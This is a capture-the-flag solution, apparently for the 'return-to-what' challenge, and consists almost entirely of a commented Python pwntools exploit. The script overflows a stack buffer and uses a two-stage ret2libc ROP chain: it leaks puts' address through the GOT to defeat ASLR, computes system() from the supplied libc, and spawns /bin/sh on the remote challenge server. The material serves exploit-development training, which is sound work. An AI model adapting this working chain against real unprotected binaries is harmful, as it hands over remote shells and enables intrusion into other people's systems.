Tags: bufferoverflow ret2libc ropchain 

Rating:

Buffer Overflow, Standard Return2Libc

```
#!/usr/bin/python
"""Two-stage ret2libc solver for the 'return-to-what' challenge.

Stage 1 overflows the stack buffer with a ROP chain that (a) calls gets()
to store a second input line in .bss and (b) calls puts() on the GOT entry
of puts so the server prints puts' resolved libc address, then returns to
main for a second round.  Stage 2 uses that leak plus the offsets in the
supplied libc.so.6 to compute system() and calls it on the .bss string.

The leak step exists because libc is loaded at a randomised base (ASLR);
the binary's own addresses (PLT, GOT, .bss) are used without any base
adjustment, which presumably means the target is built without PIE and
the 56-byte pad reaches the saved return address without tripping a
stack canary — verify with checksec before reusing this layout.
"""

from pwn import *

# Target is 64-bit Linux; DEBUG logging prints every byte sent/received.
context(os='linux',arch='amd64')
context.log_level = 'DEBUG'

# Local run kept for reference; the live run talks to the challenge server.
#p = process('./return-to-what')
p = remote('chal.duc.tf', 30003)
e = ELF('./return-to-what')
libc = ELF('./libc.so.6')  # libc shipped with the challenge; offsets come from here

# Padding up to the saved return address (56 bytes, presumably buffer +
# saved rbp — confirm against the challenge binary).
JUNK = "A"*56

# Static addresses taken straight from the target ELF (no base adjustment).
main = e.symbols['main']
gets = e.plt['gets']
plt_puts = e.plt['puts']
got_puts = e.got['puts']
# First 'pop rdi; ret' gadget in the binary: loads the single argument for
# the SysV x86-64 calling convention.
pop_rdi = e.search(asm('pop rdi; ret')).next()
# Scratch location inside the writable .bss section, offset to avoid
# clobbering whatever lives at the start of the section.
bss = e.get_section_by_name('.bss')["sh_addr"]+1500

# Stage-1 chain:
#   rdi = bss; gets(bss)         -> reads the next input line into .bss
#   rdi = got_puts; puts(got_puts) -> prints the resolved address of puts
#   main                          -> restart so a second chain can be sent
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_rdi) + p64(got_puts) + p64(plt_puts) + p64(main)

p.recvuntil("to?\n")
p.sendline(payload)
# Consumed by the gets() call in the chain; NUL-terminated for system().
p.sendline("/bin/sh\x00")

# puts stops at the first NUL, so the leaked pointer arrives as <8 bytes;
# right-pad before unpacking as a little-endian qword.
leak = u64(p.recvline().strip().ljust(8,"\x00"))
print hex(leak)

# libc base = leaked runtime address of puts - puts' offset in libc.so.6.
libc_puts = libc.symbols['puts']
libc_system = libc.symbols['system']
lba = leak - libc_puts

# Stage-2 chain: rdi = bss (the "/bin/sh" string); system(bss).
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(libc_system + lba)

p.recvuntil("to?\n")
p.sendline(payload)

p.interactive()
```